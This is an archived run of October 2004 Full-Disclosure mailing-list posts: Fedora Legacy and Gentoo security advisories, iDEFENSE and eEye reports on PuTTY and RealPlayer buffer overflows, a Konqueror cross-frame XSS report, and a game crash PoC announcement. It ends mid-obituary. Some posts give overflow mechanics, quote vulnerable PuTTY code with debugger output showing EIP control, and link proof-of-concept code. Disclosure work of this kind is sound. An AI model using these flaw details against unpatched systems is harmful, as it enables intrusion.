http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-devel-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-dom-inspector-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-js-debugger-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-mail-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nspr-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nspr-devel-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nss-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nss-devel-1.4.3-0.9.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/galeon-1.2.13-0.9.2.legacy.i386.rpm

Fedora Core 1:

SRPM:

http://download.fedoralegacy.org/fedora/1/updates/SRPMS/mozilla-1.4.3-1.fc1.1.legacy.src.rpm
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/epiphany-1.0.4-2.4.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-chat-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-devel-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-dom-inspector-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-js-debugger-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-mail-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nspr-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nspr-devel-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nss-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nss-devel-1.4.3-1.fc1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/epiphany-1.0.4-2.4.legacy.i386.rpm

7. Verification:

SHA1 sum Package Name
---------------------------------------------------------------------------

8b26049e02b8ba752151edbbda3a7ac13550f419 redhat/7.3/updates/SRPMS/mozilla-1.4.3-0.7.1.legacy.src.rpm
d21e84f5b3d17317424b521fe5bb6a1771187532 redhat/7.3/updates/SRPMS/galeon-1.2.13-0.7.1.legacy.src.rpm
367a2c8360f0e8f984a63da7e3e6ccadc692341c redhat/7.3/updates/i386/mozilla-1.4.3-0.7.1.legacy.i386.rpm
3675dc6ec08f513dca4a56b5c26b2632d1d9081e redhat/7.3/updates/i386/mozilla-chat-1.4.3-0.7.1.legacy.i386.rpm
7765e5bf8d219a2337396b65e6983c79a44c9d7b redhat/7.3/updates/i386/mozilla-devel-1.4.3-0.7.1.legacy.i386.rpm
5e363fe99cbad7745de8e93b2420e7281a08c038 redhat/7.3/updates/i386/mozilla-dom-inspector-1.4.3-0.7.1.legacy.i386.rpm
cffefef5b6b67d5e40a4f988503982af9a4cb49b redhat/7.3/updates/i386/mozilla-js-debugger-1.4.3-0.7.1.legacy.i386.rpm
e6d7563bf90f5f6bd4246e2b07097d37ac18e256 redhat/7.3/updates/i386/mozilla-mail-1.4.3-0.7.1.legacy.i386.rpm
e04ab6de0904386e881541234a8604e6283fbd00 redhat/7.3/updates/i386/mozilla-nspr-1.4.3-0.7.1.legacy.i386.rpm
a333e23e084b9d59488db7451b991b3775d3c774 redhat/7.3/updates/i386/mozilla-nspr-devel-1.4.3-0.7.1.legacy.i386.rpm
0611c836e192bed899e30c261e17736c4a5a1b78 redhat/7.3/updates/i386/mozilla-nss-1.4.3-0.7.1.legacy.i386.rpm
04789c2b7516018e0fdbae8c0c24edba98a373b7 redhat/7.3/updates/i386/mozilla-nss-devel-1.4.3-0.7.1.legacy.i386.rpm
14287024fbe57fc555c5e8fa2736d2a708ae2dc6 redhat/7.3/updates/i386/galeon-1.2.13-0.7.1.legacy.i386.rpm

4cba85b2190de4bbd96505a0433cad388e3a2e26 redhat/9/updates/SRPMS/mozilla-1.4.3-0.9.1.legacy.src.rpm
f5cf30105dbec5d0f24270e418141ba556df7db0 redhat/9/updates/SRPMS/galeon-1.2.13-0.9.2.legacy.src.rpm
5623fba5418718a38eb47a334866833d5705f809 redhat/9/updates/i386/mozilla-1.4.3-0.9.1.legacy.i386.rpm
17a567dc4151929cd998fa145631a939edb658ea redhat/9/updates/i386/mozilla-chat-1.4.3-0.9.1.legacy.i386.rpm
c94427f671fc72f3198c3947feb1a55e14cb285f redhat/9/updates/i386/mozilla-devel-1.4.3-0.9.1.legacy.i386.rpm
a11eecf474c891edcc64dcb07e85ffef0af17b42 redhat/9/updates/i386/mozilla-dom-inspector-1.4.3-0.9.1.legacy.i386.rpm
eff086a513ad6a62c64e0f5875c8407e706360ed redhat/9/updates/i386/mozilla-js-debugger-1.4.3-0.9.1.legacy.i386.rpm
f11ac30cfc4ef65c0670c381f47b69a342e4db22 redhat/9/updates/i386/mozilla-mail-1.4.3-0.9.1.legacy.i386.rpm
1b69070ca96ef10c60ce7fdb115b730bdf17a5ca redhat/9/updates/i386/mozilla-nspr-1.4.3-0.9.1.legacy.i386.rpm
aa8c04f0b2d3cefed5222c2940240ecfc3780315 redhat/9/updates/i386/mozilla-nspr-devel-1.4.3-0.9.1.legacy.i386.rpm
5cf1c268091e7b88732e8efa58d48cf225e70800 redhat/9/updates/i386/mozilla-nss-1.4.3-0.9.1.legacy.i386.rpm
6911b2dc76ef48c309c425bd2b8d620941b5c023 redhat/9/updates/i386/mozilla-nss-devel-1.4.3-0.9.1.legacy.i386.rpm
d99fb9b15188b9d58ad67051cd3e3468ac02681c redhat/9/updates/i386/galeon-1.2.13-0.9.2.legacy.i386.rpm

861196199b25fe56d2f2d990c4eb74fad537a643 fedora/1/updates/SRPMS/mozilla-1.4.3-1.fc1.1.legacy.src.rpm
8dd0c2479974060a9b4c64e7fb7bb7bfe08bfca0 fedora/1/updates/SRPMS/epiphany-1.0.4-2.4.legacy.src.rpm
346049a0d8835253ee9f97249b0ac834cb664bfc fedora/1/updates/i386/mozilla-1.4.3-1.fc1.1.legacy.i386.rpm
4898da95488b5fbb6962613c383f42faaf5ff4ba fedora/1/updates/i386/mozilla-chat-1.4.3-1.fc1.1.legacy.i386.rpm
edc0eeeaf12cc95c4838375c61140c0a12df423b fedora/1/updates/i386/mozilla-devel-1.4.3-1.fc1.1.legacy.i386.rpm
871e5ea09920d2844acd74188202c5f99b177bc9 fedora/1/updates/i386/mozilla-dom-inspector-1.4.3-1.fc1.1.legacy.i386.rpm
75d8796d1e902fa56fc8665850a7027d189bd809 fedora/1/updates/i386/mozilla-js-debugger-1.4.3-1.fc1.1.legacy.i386.rpm
08a55541cc0062892b4ae7e11f12ea041dfdc5c2 fedora/1/updates/i386/mozilla-mail-1.4.3-1.fc1.1.legacy.i386.rpm
a00c8f63b2ac924794e533582adecd979ca5aebb fedora/1/updates/i386/mozilla-nspr-1.4.3-1.fc1.1.legacy.i386.rpm
a3e31f50a30ce3bb9d280bbcd0a941c2910534bd fedora/1/updates/i386/mozilla-nspr-devel-1.4.3-1.fc1.1.legacy.i386.rpm
df50478720c9430b1e9edbcd96323db6bf15c48b fedora/1/updates/i386/mozilla-nss-1.4.3-1.fc1.1.legacy.i386.rpm
ebefb845a937bca2c0655f5dd6d43bdf9759a871 fedora/1/updates/i386/mozilla-nss-devel-1.4.3-1.fc1.1.legacy.i386.rpm
5885ec55134e6bffe7be6e0ec527b668e1f8b262 fedora/1/updates/i386/epiphany-1.0.4-2.4.legacy.i386.rpm

These packages are GPG signed by Fedora Legacy for security. Our key is
available from http://www.fedoralegacy org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

https://rhn.redhat.com/errata/RHSA-2004-110.html
https://rhn.redhat.com/errata/RHSA-2004-383.html
https://rhn.redhat.com/errata/RHSA-2004-486.html

9. Contact:

The Fedora Legacy security contact is <secnoticefedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBf2e/YzuFKFF44qURAq4qAJ9okIiXwWsr0VPLkEJj/NNWGb0E5QCeL4Qn
h5npZKWfNiMyG8smV2O/80I=
=63gc
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-27 ] mpg123: Buffer overflow vulnerabilities

From: Kurt Lieber (kliebergentoo.org)
Date: Wed Oct 27 2004 - 07:26:04 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-27
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: mpg123: Buffer overflow vulnerabilities
      Date: October 27, 2004
      Bugs: #68343
        ID: 200410-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Buffer overflow vulnerabilities have been found in mpg123 which could
lead to execution of arbitrary code.

Background
==========

mpg123 is a MPEG Audio Player.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 media-sound/mpg123 < 0.59s-r5 >= 0.59s-r5

Description
===========

Buffer overflow vulnerabilities in the getauthfromURL() and http_open()
functions have been reported by Carlos Barros. Additionally, the Gentoo
Linux Sound Team fixed additional boundary checks which were found to
be lacking.

Impact
======

By enticing a user to open a malicious playlist or URL or making use of
a specially-crafted symlink, an attacker could possibly execute
arbitrary code with the rights of the user running mpg123.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All mpg123 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-sound/mpg123-0.59s-r5"

References
==========

  [ 1 ] Security Advisory by Carlos Barros
        http://www.barrossecurity.com/advisories/mpg123_getauthfromurl_bof_advisory.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-27.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFBf5PcJPpRNiftIEYRAr7CAKCHosFiP2R8iYKuRmhk3KvJYxOehACeOPso
mfv9QmRfMccHTl48sznuFso=
=XPwo
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] KDE 3.2.2 (sarge) Konqueror suffers XSS vuln.

From: Yanosz (yanoszgmx.net)
Date: Wed Oct 27 2004 - 08:45:21 CDT

Package: Konqueror
Version: 3.2.2-1 (sarge)
Severity: Important

In contrast to other browsers like firefox, Konqueror allows JavaScript to
access other frames in a frameset, loaded with from different (sub)domain. By
that enclosed / secret data can be read through a hidden frameset.
See http://groenndemon.de/bla for demonstration.

(I'd like also to thank the webmaster for motivating me to explore that issue
and setting a wegpage up for demonstration)

(Translation: Action Ändern -> Change action
Passwort klauen -> steel password
Abschicken -> submit)

Please verify this issue on other versions - 3.1.4 seems to be affected as
well.

Keep smiling
yanosz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: KDE 3.2.2 (sarge) Konqueror suffers XSS vuln.

From: Yanosz (yanoszgmx.net)
Date: Wed Oct 27 2004 - 08:51:49 CDT

Greetings,

sorry, I forgot to mention that the hole is fixed in konqueror v 3.2.3 but
propably still not fixed in stable. (2.2.2)

So table

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Bug#278518: KDE 3.2.2 (sarge) Konqueror suffers XSS vuln.

From: Adeodato Simó (asp16alu.ua.es)
Date: Wed Oct 27 2004 - 09:00:07 CDT

* Yanosz [Wed, 27 Oct 2004 15:45:21 +0200]:
> Package: Konqueror
> Version: 3.2.2-1 (sarge)
> Severity: Important

> In contrast to other browsers like firefox, Konqueror allows JavaScript to
> access other frames in a frameset, loaded with from different (sub)domain. By
> that enclosed / secret data can be read through a hidden frameset.
> See http://groenndemon.de/bla for demonstration.

  please see http://bugs.debian.org/261740. version 3.2.3-1.sarge.1
  (available in testing-proposed-updates) fixed the vulnerability and
  will be included in sarge.

  you can use this version by adding this line to your sources.list:

    deb http://your.mirror.debian.org/debian sarge-proposed-updates main

  thanks,

--
Adeodato Simó
    EM: asp16 [ykwim] alu.ua.es | PK: DA6AE621
 
If there is a sin against life, it consists perhaps not so much in
despairing of life as in hoping for another life and in eluding the
implacable grandeur of this life.
                -- Albert Camus

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-28 ] rssh: Format string vulnerability

From: Thierry Carrez (koongentoo.org)
Date: Wed Oct 27 2004 - 10:02:09 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: rssh: Format string vulnerability
      Date: October 27, 2004
      Bugs: #66988
        ID: 200410-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

rssh is vulnerable to a format string vulnerability that allows
arbitrary execution of code with the rights of the connected user,
thereby bypassing rssh restrictions.

Background
==========

rssh is a restricted shell, allowing only a few commands like scp or
sftp. It is often used as a complement to OpenSSH to provide limited
access to users.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-shells/rssh < 2.2.2 >= 2.2.2

Description
===========

Florian Schilhabel from the Gentoo Linux Security Audit Team found a
format string vulnerability in rssh syslogging of failed commands.

Impact
======

Using a malicious command, it may be possible for a remote
authenticated user to execute arbitrary code on the target machine with
user rights, effectively bypassing any restriction of rssh.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All rssh users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-shells/rssh-2.2.2"

References
==========

  [ 1 ] rssh security announcement
        http://www.pizzashack.org/rssh/security.shtml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-28.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Bug#278518: KDE 3.2.2 (sarge) Konqueror suffers XSS vuln.

From: Yanosz (yanoszgmx.net)
Date: Wed Oct 27 2004 - 10:20:28 CDT

Greetings,...

Am Mittwoch, 27. Oktober 2004 16:00 schrieb Adeodato Simó:
> * Yanosz [Wed, 27 Oct 2004 15:45:21 +0200]:
> > Package: Konqueror
> > Version: 3.2.2-1 (sarge)
> > Severity: Important
> >
> > In contrast to other browsers like firefox, Konqueror allows JavaScript
> > to access other frames in a frameset, loaded with from different
> > (sub)domain. By that enclosed / secret data can be read through a hidden
> > frameset. See http://groenndemon.de/bla for demonstration.
>
> please see http://bugs.debian.org/261740. version 3.2.3-1.sarge.1
> (available in testing-proposed-updates) fixed the vulnerability and
> will be included in sarge.

Ooops. Sorry.
Is stable affected as well?

Keep smiling
yanosz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Crashs in Master of Orion III 1.2.5

From: Luigi Auriemma (aluigiautistici.org)
Date: Wed Oct 27 2004 - 13:45:00 CDT

#######################################################################

                             Luigi Auriemma

Application: Master of Orion III
              http://moo3.quicksilver.com
Versions: <= 1.2.5
Platforms: Windows and MacOS
Bugs: - allocation error
              - big nicknames crash
Exploitation: remote, versus server
Date: 27 October 2004
Author: Luigi Auriemma
              e-mail: aluigialtervista.org
              web: http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Master of Orion III is a spatial strategy game developed by Quicksilver
(http://www.quicksilver.com) and released in February 2003.

#######################################################################

=======
2) Bugs
=======

-------------------
A] allocation error
-------------------

Each data block exchanged between clients and server is preceded by a
32 bits number used to specify its size.
This amount of data is automatically allocated by the game and if it is
too big, and so unallocable, the game automatically exits.

----------------------
B] big nicknames crash
----------------------

The game uses some anti buffer-overflow protections but if an attacker
makes multiple consecutive connections (variable between 1 and 10)
using big nicknames, the game crashs.

#######################################################################

===========
3) The Code
===========

http://aluigi.altervista.org/poc/moo3boom.zip

#######################################################################

======
4) Fix
======

No fix.
Developers will not fix this problem unless there are significant
incidents reported.

#######################################################################

---
Luigi Auriemma
http://aluigi.altervista.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] iDEFENSE Security Advisory 10.27.04: PuTTY SSH2_MSG_DEBUG Buffer Overflow Vulnerability

idlabs-advisoriesidefense.com
Date: Wed Oct 27 2004 - 11:34:45 CDT

PuTTY SSH2_MSG_DEBUG Buffer Overflow Vulnerability

iDEFENSE Security Advisory 10.27.04
www.idefense.com/application/poi/display?id=155&type=vulnerabilities
October 27, 2004

I. BACKGROUND

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix
platforms, along with an xterm terminal emulator.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Simon Tatham's
PuTTY can allow attackers to execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds
checking on SSH2_MSG_DEBUG packets. The 'stringlen' parameter is given a
user-supplied value by reading in an integer from an offset in the
packet data. The 'stringlen' value is incorrectly checked due to
signedness issues as seen below.

-- snip --
static int ssh2_rdpkt(Ssh ssh, unsigned char **data, int *datalen)
{
  struct rdpkt2_state_tag *st = &ssh->rdpkt2_state;
  ...
  switch (ssh->pktin.type) {
        ...
         case SSH2_MSG_DEBUG:
             {
                      char buf[512];
                    int stringlen = GET_32BIT(ssh->pktin.data+7);
                        int prefix;
                        strcpy(buf, "Remote debug message: ");
                        prefix = strlen(buf);
                        if (stringlen > (int)(sizeof(buf)-prefix-1))
                        stringlen = sizeof(buf)-prefix-1;
[!] memcpy(buf + prefix,
                                ssh->pktin.data + 11, stringlen);
                        buf[prefix + stringlen] = '\0';
                        logevent(buf);
                 }
-- snip --

The following debugger output shows successful control of program
execution:

EAX CC004019
ECX 00401909 putty.00401909
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 00129FC8
EBP 00129FDC
ESI 0012A0A4
EDI 7C9037BF ntdll.7C9037BF
EIP 0012FFBA

SEH chain of main thread
Address SE handler
0012FFB0 putty.00401905

Log data, item 0
 Address=0012FFB9
 Message=INT3 command at 0012FFB9

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under the
privileges of the user running PuTTY. The client must be directed to
connect to a malicious server in order to trigger the vulnerability.

IV. DETECTION

iDEFENSE has confirmed that PuTTY 0.55 is vulnerable.

V. WORKAROUND

An alternate SSH client can be used to connect to untrusted hosts.

VI. VENDOR RESPONSE

PuTTY 0.56 addresses this problem and is available for download at:

   http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

10/21/2004 Initial vendor notification
10/21/2004 iDEFENSE clients notified
10/22/2004 Initial vendor response
10/27/2004 Public disclosure

IX. CREDIT

An anonymous contributor is credited with discovering this
vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerserviceidefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Hugo van der Kooij (hvdkooijvanderkooij.org)
Date: Wed Oct 27 2004 - 15:13:04 CDT

On Wed, 27 Oct 2004, Elia Florio wrote:

> Of course, I'd like to support Clam team....they're working
> hard for a valuable open-source AV and I appreciate this too!
> I can send to them my reports (extracted from virustotal.com) and
> the un-detect files (exe,dll,class,javascript,html) with
> malware/trojan and exploits taken from "xpire.info".
>
> Where do I send this archive? What's the mail address?
> Must I use a PGP key or simply a password-protected zip?

The following page should inform you about everything you need to know:
http://clamav.catt.com/cgi-bin/sendvirus.cgi

Hugo.

--
        I hate duplicates. Just reply to the relevant mailinglist.
        hvdkooijvanderkooij.org http://hvdkooij.xs4all.nl/
                Don't meddle in the affairs of magicians,
                for they are subtle and quick to anger.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] EEYE: RealPlayer Zipped Skin File Buffer Overflow

From: Marc Maiffret (mmaiffreteeye.com)
Date: Wed Oct 27 2004 - 15:40:22 CDT

RealPlayer Zipped Skin File Buffer Overflow

Release Date:
October 27, 2004

Date Reported:
October 11, 2004

Severity:
High (Code Execution)

Vendor:
RealNetworks

Systems Affected:
For Microsoft Windows
RealPlayer 10.5 (6.0.12.1053 and earlier)
RealPlayer 10
RealOne Player v2
RealOne Player v1

Overview:
eEye Digital Security has discovered a vulnerability in RealPlayer that
allows a remote attacker to reliably overwrite the stack with arbitrary
data and execute arbitrary code in the context of the user under which
the player is running.

Technical Details:
A RealPlayer skin file (.rjs extension) can be downloaded and applied
automatically through a web browser without the user's permission. A
skin file is a bundle of graphics and a .ini file, stored together in
ZIP format. DUNZIP32.DLL, which is included with RealPlayer, is used to
extract the contents of the skin file. When an .rjs file containing a
long file name (greater than around 0x8000 bytes) is opened, either in
RealPlayer or through a web browser, a stack based buffer overflow
occurs, allowing an exception handler record to be overwritten and EIP
to be hijacked.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
RealNetworks has released a patch for this vulnerability. The patch is
available via the "Check for Update" menu item under Tools on the
RealPlayer menu bar. "Security Update - Skin File Overflow" Recommended
Player Update: Resolves a security vulnerability when activating a
specifically malformed skins file. Skins files available on RealNetworks
site are examined before being posted. Skins files from other sources
should be treated with caution.

Credit:
Discovery: Yuji Ukai

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/Products/Retina/download.html

Greetings:
TCC, YY, KEN, O.C., GuysShinbashi_Sanuki-Iyo_Place,
GuysNightLandSlotmachinePlayroom

Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alerteEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-29 ] PuTTY: Pre-authentication buffer overflow

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Wed Oct 27 2004 - 16:47:43 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-29
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: PuTTY: Pre-authentication buffer overflow
      Date: October 27, 2004
      Bugs: #69123
        ID: 200410-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

PuTTY contains a vulnerability allowing an SSH server to execute
arbitrary code on the connecting client.

Background
==========

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix
platforms, along with an xterm terminal emulator.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-misc/putty <= 0.55 >= 0.56

Description
===========

PuTTY fails to do proper bounds checking on SSH2_MSG_DEBUG packets. The
"stringlen" parameter value is incorrectly checked due to signedness
issues. Note that this vulnerability is similar to the one described in
GLSA 200408-04 but not the same.

Impact
======

When PuTTY connects to a server using the SSH2 protocol, an attacker
may be able to send specially crafted packets to the client, resulting
in the execution of arbitrary code with the permissions of the user
running PuTTY. Note that this is possible during the authentication
process but before host key verification.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PuTTY users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/putty-0.56"

References
==========

  [ 1 ] iDEFENSE Security Advisory 10.27.04
        http://www.idefense.com/application/poi/display?id=155
  [ 2 ] PuTTY ChangeLog
        http://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-29.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBgBeFzKC5hMHO6rkRAuLuAJ9u0LwYx5mqaWivhqtHlbXtPGqHmQCgjdkM
dT7RZFUNhC4HcTaBNua3fF4=
=OMob
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] PTms04-030

From: pigrelax (pigrelaxyandex.ru)
Date: Tue Oct 26 2004 - 03:21:38 CDT

PTms04-030 - tool for checking WebDAV XML DoS vulnerability.

More information and download:

http://www.securitylab.ru/tools/48998.html

This email and any files transmitted with it are intended for the named recipient only. The information contained in this message may be confidential, legally privileged or commercially sensitive. If you are not the intended recipient you must not reproduce or distribute any part of the email, disclose its contents to any other party, or take any action in reliance on it. If you have received this email in error, please contact the sender immediately by return email and delete this message from your computer.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Death Notice: Matt Heckaman

From: J.A. Terranson (measlmfn.org)
Date: Wed Oct 27 2004 - 23:11:20 CDT

[Posted to a variety of places, as Matt was a prolific coder who
maintained many ports and worked on literally dozens of projects]

--
Yours,

J.A. Terranson
sysadminmfn.org
0xBD4A95BF

        "An ill wind is stalking
        while evil stars whir
        and all the gold apples
        go bad to the core"

        S. Plath, Temper of Time

------------------------------------------------------------------------------

http://obit.pumphreyfuneralhome.com/obit_display.cgi?id=161939&listing=Current

Matthew Heckaman Ferraro
Born in Mishawaka, IN on Jan. 4, 1982
Departed on Oct. 20, 2004 and resided in Gaithersburg, MD.

Memorial Service: Oct. 30, 2004
Cemetery: Arlington National Cemetery Columbarium
Please click on the links above for locations, times, maps, and
directions.

Matthew Heckaman Ferraro (age 22)
Matthew of Gaithersburg, MD, formerly of Montreal Canada,
passed away on Wednesday, October 20, 2004. He was the beloved
husband of Stacie Jo Ferraro; loving son of Claire Ferraro
(husband, Eddy) and Marshall Heckaman (wife, Sharon) of Indiana;
loving brother of Andria, David and Allan; stepbrother of Cynthia
Ferraro (Daniel Aston) son-in-law of Mike and Marjorie Bland of
